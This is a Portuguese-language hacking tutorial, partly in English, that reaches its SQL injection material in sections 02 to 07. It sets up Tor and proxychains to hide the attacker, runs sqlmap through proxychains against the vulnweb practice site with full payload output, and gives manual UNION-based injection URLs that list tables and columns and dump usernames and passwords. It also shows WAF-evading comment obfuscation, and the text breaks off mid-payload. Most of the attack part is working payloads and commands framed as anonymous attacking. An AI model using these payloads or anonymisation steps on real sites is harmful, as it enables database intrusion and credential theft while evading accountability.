SQL Injection - ( )


Manual SQL Injection

Kali tool - Sqlmap


*** Página melhor visualizada no " navegador Chrome "


Index


01 - Leis

02 - Proxychains

03 - Firefox add-ons ( Tor )

04 - Tor Brower HackBar

05 - Online Labs

06 - SQL Injection - Manual injection  ( example 1 )

07 - Some more manual injection command examples

08 - Kali Linux - installing and setting up

09 - SQL Injetion with sqlmap        ( example 2 )

10 - Some more sqlmap parameters

11 - Setting up dvwa lab

12 - Cracking passwords with hydra

13 - Cracking passwords with john the ripper

14 - uploaders

15 - dirb

16 - nikto

17 - uniscan

18 - compiling c

19 - perl

20 - python

21 - shell encoding

22 - Compactando - zip, rar, tar.gz, bz2, tar, bz2

23 - 10 minute email

24 - Encryt x Decrypt Text



01 - Sobre as leis

Apelidada de Lei Carolina Dieckmann, a Lei dos Crimes Cibernéticos (12.737/2012)
tipifica como crimes infrações relacionadas ao meio eletrônico, como invadir computado-
res, violar dados de usuários ou "derrubar" sites.

O projeto que deu origem à lei (PLC 35/2012) foi elaborado na época em que fotos ínti-
mas da atriz Carolina Dieckmann foram copiadas de seu computador e espalhadas pela rede
mundial de computadores. O texto era reividicado pelo sistema financeiro, dada a quan-
tidade de golpes aplicados pela internet.


Entrou em vigor no dia 02/04/2013

Invasão de dispositivo informático:

Pode dar uma punição de prisão que via de 3 meses à um ano, além de multa.

Obter pela invasão conteúdo de “comunicações eletrônicas privadas, segredos comerciais
ou industriais, informações sigilosas”:

Pena de 6 meses à 2 anos de prisão, além da multa. O mesmo ocorre se o delito envolver
a divulgação, comercialização ou transmissão a terceiros, por meio de venda ou repasse
gratuito, do material obtido com a invasão.

A lei prevê ainda o aumento das penas de um sexto a um terço se a invasão causar pre-
juízo econômico e de um a dois terços “se houver divulgação, comercialização ou trans-
missão a terceiro, a qualquer título, dos dados ou informações obtidos”.

As penas também poderão ser aumentadas de um terço à metade se o crime for praticado
contra o presidente da República, presidentes do Supremo Tribunal Federal, da Câmara,
do Senado, de assembleias e câmaras legislativas, de câmaras municipais ou dirigentes
máximos “da administração direta e indireta federal, estadual, municipal ou do Distrito
Federal”.

02 - Proxychains


O Tor é um software livre e de código aberto para proteger o anonimato pessoal ao
navegar a Internet e atividades online, protegendo contra a censura e protegendo a
privacidade pessoal. A maioria das distribuições GNU/Linux disponibilizam pacotes do
Tor, embora haja versões para diferentes sistemas operacionais, tais como Windows e
Mac OS.

A rede Tor é uma rede de túneis http (com tls) sobrejacente à Internet, onde os
roteadores da rede são computadores de usuários comuns rodando um programa e com acesso
web (apenas). O objetivo principal do projeto é garantir o anonimato do usuário que
está acessando a web.

O Tor-cliente é um programa que deve ser instalado no computador e que funciona como um
proxy socks 5 para este. É fornecido um bind, geralmente na porta 9050 local da máquina.
Em seguida, os programas devem ser configurados para usar um servidor proxy socks 5 e
apontados para o endereço localhost (127.0.0.1).



Siga os passos a seguinte para instalarmos e configurarmos:


Install tor from the respository because there is always updated.

Copie e cole as duas linhas abaixo no terminal:


echo 'deb https://deb.torproject.org/torproject.org stretch main
deb-src https://deb.torproject.org/torproject.org stretch main' > /etc/apt/sources.list.d/tor.list


Then, download the Tor Project package signing key and import it into your APT keyring.

 wget -O- 'https://pgp.mit.edu/pks/lookup?op=get&search=0xA3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89' | sudo apt-key add - 


A linha acima é a mesma que esta abaixo, apenas quebrei para melhor visualização.

 wget -O- 'https://pgp.mit.edu/pks/lookup?op=
get&search=0xA3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89' | sudo apt-key add - 

-------

 apt-get update 

 apt-get install tor torsocks polipo privoxy proxychains 

-------

 tor &  

Mar 15 14:22:56.060 [notice] Tor 0.2.9.9 (git-1d8323c042800718) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.1.0c and Zlib 1.2.8.
Mar 15 14:22:56.061 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Mar 15 14:22:56.062 [notice] Read configuration file "/etc/tor/torrc".
Mar 15 14:22:56.069 [notice] Opening Socks listener on 127.0.0.1:9050
Mar 15 14:22:56.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip.
Mar 15 14:22:56.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6.
Mar 15 14:22:56.000 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
Mar 15 14:22:56.000 [notice] Bootstrapped 0%: Starting
Mar 15 14:22:57.000 [notice] Bootstrapped 5%: Connecting to directory server
Mar 15 14:22:57.000 [notice] Bootstrapped 10%: Finishing handshake with directory server
Mar 15 14:22:57.000 [notice] Bootstrapped 15%: Establishing an encrypted directory connection
Mar 15 14:22:58.000 [notice] Bootstrapped 20%: Asking for networkstatus consensus
Mar 15 14:22:58.000 [notice] Bootstrapped 25%: Loading networkstatus consensus
Mar 15 14:22:59.000 [notice] I learned some more directory information, but not enough to build a circuit: We have no usable consensus.
Mar 15 14:23:00.000 [notice] Bootstrapped 40%: Loading authority key certs
Mar 15 14:23:00.000 [notice] Bootstrapped 45%: Asking for relay descriptors
Mar 15 14:23:00.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/7344, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of exit bw = 0% of path bw.)
Mar 15 14:23:01.000 [notice] Bootstrapped 50%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 55%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 61%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 70%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 75%: Loading relay descriptors
Mar 15 14:23:04.000 [notice] Bootstrapped 80%: Connecting to the Tor network
Mar 15 14:23:05.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
Mar 15 14:23:06.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
Mar 15 14:23:06.000 [notice] Bootstrapped 100%: Done

-------

 tor --verify-config 
Dec 10 11:29:52.237 [notice] Tor 0.3.4.9 (git-de9ea9f0dfc5ecae) running on Linux with Libevent 2.1.8-stable, OpenSSL 1.1.1a, Zlib 1.2.11, Liblzma 5.2.2, and Libzstd 1.3.5.
Dec 10 11:29:52.237 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Dec 10 11:29:52.238 [notice] Read configuration file "/etc/tor/torrc".
Dec 10 11:29:52.241 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
Configuration was valid

-------

 tor -f /path/to/your/own/torrc 
Dec 10 11:30:45.233 [notice] Tor 0.3.4.9 (git-de9ea9f0dfc5ecae) running on Linux with Libevent 2.1.8-stable, OpenSSL 1.1.1a, Zlib 1.2.11, Liblzma 5.2.2, and Libzstd 1.3.5.
Dec 10 11:30:45.233 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Dec 10 11:30:45.233 [warn] Unable to open configuration file "/path/to/your/own/torrc".
Dec 10 11:30:45.234 [err] Reading config failed--see warnings above.

-------

 netstat -tanp | grep tor 
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN      9730/tor
tcp        0      0 192.168.2.199:52786     134.119.3.164:9001      ESTABLISHED 9730/tor
tcp        0      0 192.168.2.199:60570     163.172.185.132:443     ESTABLISHED 9730/tor
tcp        0      0 192.168.2.199:56166     82.196.12.245:443       ESTABLISHED 9730/tor
tcp        0      0 192.168.2.199:37466     139.59.210.164:443      ESTABLISHED 9730/tor
tcp        0      0 192.168.2.199:37472     198.96.155.3:5001       ESTABLISHED 9730/tor
tcp        0      0 192.168.2.199:48184     193.171.202.146:9001    ESTABLISHED 9730/tor

-------

 netstat -antlp | grep LISTEN 
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      830/sshd
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN      3166/tor
tcp        0      0 127.0.0.1:8123          0.0.0.0:*               LISTEN      2135/polipo
tcp6       0      0 :::22                   :::*                    LISTEN      830/sshd

-------

 netstat -tanp | grep tor 
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN      3166/tor
tcp        0      0 192.168.142.129:49378   193.70.43.76:9001       ESTABLISHED 3166/tor
tcp        0      0 192.168.142.129:36678   194.88.105.97:443       ESTABLISHED 3166/tor
tcp        0      0 192.168.142.129:44512   144.76.236.14:443       ESTABLISHED 3166/tor
tcp        0      0 192.168.142.129:49972   185.100.86.128:9001     ESTABLISHED 3166/tor
tcp        0      0 192.168.142.129:50070   176.10.104.240:443      ESTABLISHED 3166/tor

-------

 nano /etc/proxychains.conf 

dynamic_chain

strict_chain

random_chain

proxy_dns

tcp_read_time_out 15000
tcp_connect_time_out 8000

socks4  127.0.0.1 9050
socks5  127.0.0.1 9050

ctrl + x + y + enter  ( salvar e sair do arquivo )

-------

service tor restart 

-------

 service tor status 
● tor.service - Anonymizing overlay network for TCP (multi-instance-master)
   Loaded: loaded (/lib/systemd/system/tor.service; disabled; vendor preset: disabled)
   Active: active (exited) since Sat 2018-12-01 11:50:09 EST; 2min 4s ago
   Process: 2068 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
   Main PID: 2068 (code=exited, status=0/SUCCESS)

Dec 01 11:50:09 kali systemd[1]: Starting Anonymizing overlay network for TCP (multi-instance-master)...
Dec 01 11:50:09 kali systemd[1]: Started Anonymizing overlay network for TCP (multi-instance-master).

-------

Parando processo.

 service privoxy stop && service tor stop 

-------

Para permacer anonimo inicie os processos abaixo.
service privoxy start && service tor start
------- Atualizando sistema. apt-get update ------- Mostrando status do tor. service tor status tor.service - LSB: Starts The Onion Router daemon processes Loaded: loaded (/etc/init.d/tor) Active: active (running) since Mon 2016-06-13 09:21:08 EDT; 37min ago Process: 1859 ExecStop=/etc/init.d/tor stop (code=exited, status=0/SUCCESS) Process: 1870 ExecStart=/etc/init.d/tor start (code=exited, status=0/SUCCESS) CGroup: /system.slice/tor.service 1881 /usr/bin/tor --defaults-torrc /usr/share/tor/tor-service-defaults-torrc --hush Jun 13 09:21:08 kali tor[1870]: Starting tor daemon...done. ------- Verificando. netstat -ant | grep 8118 tcp 0 0 127.0.0.1:8118 0.0.0.0:* LISTEN
tcp6 0 0 ::1:8118 :::* LISTEN
------- netstat -na | grep 9050 tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN ------- netstat -tanp | grep tor tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 1881/tor tcp 0 0 192.168.1.102:38764 91.109.29.120:443 ESTABLISHED 1881/tor ------- tail -f /var/log/tor/log
Jun 13 16:50:10.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip.
Jun 13 16:50:10.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6.
Jun 13 16:50:10.000 [notice] Bootstrapped 0%: Starting
Jun 13 16:50:10.000 [notice] Bootstrapped 5%: Connecting to directory server
Jun 13 16:50:10.000 [notice] We now have enough directory information to build circuits.
Jun 13 16:50:10.000 [notice] Bootstrapped 80%: Connecting to the Tor network
Jun 13 16:50:11.000 [notice] Bootstrapped 85%: Finishing handshake with first hop
Jun 13 16:50:11.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
Jun 13 16:50:13.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
Jun 13 16:50:13.000 [notice] Bootstrapped 100%: Done

------- tor
Jun 13 16:45:51.026 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8.
Jun 13 16:45:51.026 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jun 13 16:45:51.027 [notice] Read configuration file "/etc/tor/torrc".
Jun 13 16:45:51.029 [notice] Opening Socks listener on 127.0.0.1:9050
Jun 13 16:45:51.029 [warn] Could not bind to 127.0.0.1:9050: Address already in use. Is Tor already running?
Jun 13 16:45:51.029 [notice] Opening DNS listener on 127.0.0.1:53
Jun 13 16:45:51.029 [notice] Closing partially-constructed DNS listener on 127.0.0.1:53
Jun 13 16:45:51.029 [warn] Failed to parse/validate config: Failed to bind one of the listener ports.
Jun 13 16:45:51.030 [err] Reading config failed--see warnings above.
------- tor --verify-config
Jun 13 17:02:51.335 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8.
Jun 13 17:02:51.336 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jun 13 17:02:51.336 [notice] Read configuration file "/etc/tor/torrc".
Jun 13 17:02:51.339 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.Configuration was valid -------
tor -f /path/to/your/own/torrc
Jun 13 17:04:41.936 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8.
Jun 13 17:04:41.936 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jun 13 17:04:41.936 [warn] Unable to open configuration file "/path/to/your/own/torrc".
Jun 13 17:04:41.936 [err] Reading config failed--see warnings above.
------- Vamos verificar qual é o ip do nosso servidor. export http_proxy="http://localhost:8118" ------- curl ipecho.net/plain ; echo 198.50.200.135 ------- Vamos ver de onde é este ip. whois 198.50.200.135 # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/whois_tou.html # # If you see inaccuracies in the results, please report at # https://www.arin.net/public/whoisinaccuracy/index.xhtml # NetRange: 198.50.128.0 - 198.50.255.255 CIDR: 198.50.128.0/17 NetName: OVH-ARIN-6 NetHandle: NET-198-50-128-0-1 Parent: NET198 (NET-198-0-0-0-0) NetType: Direct Allocation OriginAS: AS16276 Organization: OVH Hosting, Inc. (HO-2) RegDate: 2013-03-07 Updated: 2013-03-07 Ref: https://whois.arin.net/rest/net/NET-198-50-128-0-1 OrgName: OVH Hosting, Inc. OrgId: HO-2 Address: 800-1801 McGill College City: Montreal StateProv: QC PostalCode: H3A 2N4 Country: CA RegDate: 2011-06-22 Updated: 2016-03-25 Ref: https://whois.arin.net/rest/org/HO-2 ------- Usando proxychains com nmap. proxychains nmap -sS ip_x ------- proxychains nmap -sT -PN -n -sV -p 80,443,21,22 ip_x ------- proxychains nmap -Pn -sT -n -sV -p 21,22,23,53,80,110,139,143,443 ip_x ------- nmap -Pn -sT -p 80,443,21,22,23 80.14.163.161 Starting Nmap 7.00 ( https://nmap.org ) at 2016-06-13 15:41 EDT Nmap scan report for LStLambert-656-1-112-161.w80-14.abo.wanadoo.fr (80.14.163.161) Host is up. PORT STATE SERVICE 21/tcp filtered ftp 22/tcp filtered ssh 23/tcp filtered telnet 80/tcp filtered http 443/tcp filtered https Nmap done: 1 IP address (1 host up) scanned in 3.45 seconds ------- proxychains nmap -sV -Pn -p80,22,135 8.8.8.8 ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 7.00 ( https://nmap.org ) at 2016-06-13 14:14 EDT Nmap scan report for google-public-dns-a.google.com (8.8.8.8) Host is up (0.038s latency). PORT STATE SERVICE VERSION 22/tcp filtered ssh 80/tcp filtered http 135/tcp filtered msrpc ------- netstat -plant Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1215/sshd tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN 1881/tor tcp 0 0 192.168.1.102:38814 91.109.29.120:443 ESTABLISHED 1881/tor tcp 0 252 192.168.1.102:22 192.168.1.100:50185 ESTABLISHED 1536/1 tcp6 0 0 ::1:8118 :::* LISTEN 1854/privoxy tcp6 0 0 :::22 :::* LISTEN 1215/sshd ------- O ip acima é do Kali = 192.168.1.102 Verificando ip.. whois 91.109.29.120 | grep address

address: Kleyer Strasse 79 / Tor 13
address: 60326
address: Frankfurt
address: GERMANY
address: Kleyerstrasse 79 / Tor 13
address: 60326 Frankfurt am Main
address: Germany
------- Vamos usar proxychains com sqlmap para efetuar ataque anônimo de SQL Injection. proxychains sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --flush-session --time-sec=5 --tor-type=socks5 --tor-port=9050 ProxyChains-3.1 (http://proxychains.sf.net) _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201603300a89} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 14:26:21 |DNS-request| testphp.vulnweb.com |S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK |DNS-response| testphp.vulnweb.com is 176.28.50.165 [14:26:22] [INFO] testing connection to the target URL |DNS-request| testphp.vulnweb.com |S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK |DNS-response| testphp.vulnweb.com is 176.28.50.165 |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-|S-chain|-<>-127.0.0.1:9050-<><>- 176.28.50.165:80-<><>-OK<><>-OK [14:26:25] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS <><>-OK [14:26:26] [INFO] testing if the target URL is stable<><>-OK [14:26:26] [INFO] target URL is stable8.50.165:80- [14:26:26] [INFO] testing if GET parameter 'artist' is dynamic <><>-OK [14:26:27] [INFO] confirming that GET parameter 'artist' is dynamic <><>-OK [14:26:28] [INFO] GET parameter 'artist' is dynamic <><>-OK [14:26:29] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be injectable (possible DBMS: 'MySQL')<><>-OK [14:26:30] [INFO] testing for SQL injection on GET parameter 'artist' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] <><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y [14:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK [14:26:46] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable [14:26:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' <><>-OK [14:26:49] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'<><>-OK [14:26:50] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' <><>-OK [14:26:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' <><>-OK [14:26:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' <><>-OK [14:26:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' <><>-OK [14:26:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' <><>-OK [14:26:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)' <><>-OK [14:26:54] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'<><>-OK [14:26:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)' <><>-OK [14:26:56] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' <><>-OK [14:26:56] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'<><>-OK [14:26:57] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' <><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK [14:26:58] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' <><>-OK [14:26:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' <><>-OK [14:26:59] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' <><>-OK [14:27:00] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' <><>-OK [14:27:01] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)' <><>-OK [14:27:02] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace BIGINT UNSIGNED) ' <><>-OK [14:27:02] [INFO] testing 'MySQL inline queries'0-<><>-OK [14:27:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' <><>-OK [14:27:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)' <><>-OK [14:27:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' <><>-OK [14:27:06] [INFO] testing 'MySQL > 5.0.11 stacked queries' <><>-OK [14:27:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' <><>-OK [14:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' <><>-OK [14:27:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' <><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK [14:27:20] [INFO] GET parameter 'artist' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable [14:27:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [14:27:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK [14:27:21] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test <><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK [14:27:23] [INFO] target URL appears to have 3 columns in query<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK [14:27:29] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable <><>-OK GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if any)? [y/N] <><>-OK n sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests: --- Parameter: artist (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: artist=1 AND 9518=9518 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NsJj) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: artist=-7658 UNION ALL SELECT NULL,NULL,CONCAT(0x7162706a71, 0x54754c5165526665574370556d6777466a7541764c6d7643505265597a507274585973536a476359, 0x7178627671)-- - --- [14:32:37] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5.0.12 [14:32:37] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at 14:32:37

03 - FireFox add-ons

Tools you should have in your computer.

The Five Greatest Firefox Tools for Hacking!


Here is a list of the greatest Firefox add-ons for Hacking:

1. Hackbar           – Execute Commands like SQL Injection, XSS and more…

2. Live HTTP Headers – Capture all (HEADERS) of a Page (Used when uploading a shell….)

3. SQL Inject Me     – SQL Injection Commands and Automatations.

4. Firebug           – Edit a Website’s source code.

5. Temper Data       – Watch the data that your computer sends to a website and the data
                        the website sends to you.

6. Tor Brower        - Download and install Tor.

04 - Tor Browser + HackBar


Why to use Tor Browser?

The Tor software protects you by bouncing your communications around a distributed
network of relays run by volunteers all around the world: it prevents somebody watching
your Internet connection from learning what sites you visit, it prevents the sites you
visit from learning your physical location, and it lets you access sites which are
blocked.

Download Tor Browser: https://www.torproject.org/download/download.html.en

The Tor version is 4.5.3 ( older ), this way we are able to use the HackBar.
Newer version do not allow the hackbar.


HackBar is a Firefox extension for penetration testers. Hackbar extends the address bar of Firefox and thus provides enough space for long injection URLs during penetration testing. Hackbar also has some additional features including the ability to perform encryption, encoding, decryption, POST data manipulation, inject code generation etc. This toolbar will help you in testing sql injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site. Its main purpose is to help a developer do security audits on his code. If you know what your doing, this toolbar will help you do it faster. If you want to learn to find security holes, you can also use this toolbar, but you will probably also need a book, and a lot of google. Example using hackbar, notice it has many options ( tools ) ... Add on "anonymox" to browse websites anonymously.

05 - Laboratorio Online


Online labs.

06 - Manual Injection - example 1


Para testarmos possíveis vulnerabilidades de Sql Injection temos algumas ferramentas
que verificam se o banco de dados está ou não vulnerável.como fazer um blog


Para este aprendizado usaremos o laboratório online abaixo criado para tal finalidade:

http://testphp.vulnweb.com


Vamos começar clicando abaixo em artists




Clique no primeiro registro onde aponta a setinha vermelha.

http://testphp.vulnweb.com/artists.php




Veja na imagem abaixo o registro foi selecionado.

http://testphp.vulnweb.com/artists.php?artist=1




Agora vamos adicioar um apostrofe simples logo apos o codigo 1 para detectarmos se
nosso alvo possui falha de SQL Injection ( 1' )

http://testphp.vulnweb.com/artists.php?artist=1'

O erro abaixo indica que esta url esta vulneravel.




Agora vamos usar order by para descobrirmos o número das tabelas.

Vá acrescentando os números sequencialmente, 1,2,3,4,5... até o erro aparecer.

Quando o erro aparecer, então significa que o número anterior é o número total de
tabelas no banco de dados atualda página.

Na url digite a linha abaixo:

http://testphp.vulnweb.com/artists.php?artist=1 order by 1,2,3,4





Descobrindo a versao do sistema.

Na linha da url digite a linha abaixo:

http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,version()






Descobrindo o usuario.

http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,user()




Agora vamos identificar onde estão as tabelas.

É importante setar um ID que não existe, assim ele irá identificar as tabelas com seus
números correspondentes, neste caso deduzindo, supondo que seja 100 ...


http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,3




Veja abaixo, coluna 3 e vuneravel.




Url abaixo e uma unica linha:

http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
group_concat(table_name) from information_schema.tables





Acima as tabelas foram listadas horizontalmente, abaixo veremos como listar de forma
vertical.


Para listar as tabelas em uma unica coluna teremos que converter <br> para hexadecimal
e diante do hexa precisaremos adicionar 0x  
<br> = 0x3c62723e Para converter <br> para hexadecimal use o link abaixo: http://online-toolz.com/tools/text-hex-convertor.php Diante no valor hexa adicione 0x = 0x3c62723e Vamos listar as tabelas verticalmente. Digite a linha abaixo e uma única linha: http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2, group_concat(table_name,0x3c62723e) from information_schema.tables
Vamos listar todos as colunas da tabela artists. Digite a linha abaixo e uma única linha: http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2, group_concat(table_name,0x3c62723e) from information_schema.tables where table_schema=database() Vamos listar todos os campos da tabela artists. Digite a linha abaixo e uma única linha:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2, group_concat(column_name) from information_schema.columns where table_name='users' No link abaixo converteremos os dois pontos ( : ) para 0x3a http://www.rapidtables.com/convert/number/hex-to-ascii.htm Com as colunas selecionadas, iremos efetuar a apresentação dos dados encontrados nas colunas uname e pass da tabela users Digite a linha abaixo e uma única linha: http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2, concat(uname,0x3a,pass) from users Login : test Password: test

07 - Some more manual injection command examples


Digite a linha abaixo e uma única linha:

http://testphp.vulnweb.com/artists.php?artist=100
     union select 1,2,concat('Versao ===> ',' :: ',version())--




----------------------------------------------

Digite a linha abaixo e uma única linha:

http://testphp.vulnweb.com/artists.php?artist=100
     union select 1,2,(select+count(column_name) from information_schema.columns)

----------------------------------------------

Digite a linha abaixo e uma única linha:

http://testphp.vulnweb.com/artists.php?artist=100
     union select 1,2,(select count(table_name) from information_schema.tables)


http://testphp.vulnweb.com/artists.php?artist=100
     union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
     FROM information_schema.columns WHERE table_schema=database() 
     GROUP BY table_name LIMIT 0,1


http://testphp.vulnweb.com/artists.php?artist=100
     /*!50000uNiOn*/ /*!50000select*/ all 1,2,/*!50000 group_concat(table_name)*/
     /*!50000from*/ information_schema.tables where table_schema=database()


http://testphp.vulnweb.com/artists.php?artist=100 /*!50000uNiOn*/
     /*!50000select*/ all 1,2,/*!50000 gRoUp_cOnCat(table_name,0x3c62723e)*/ /*!50000
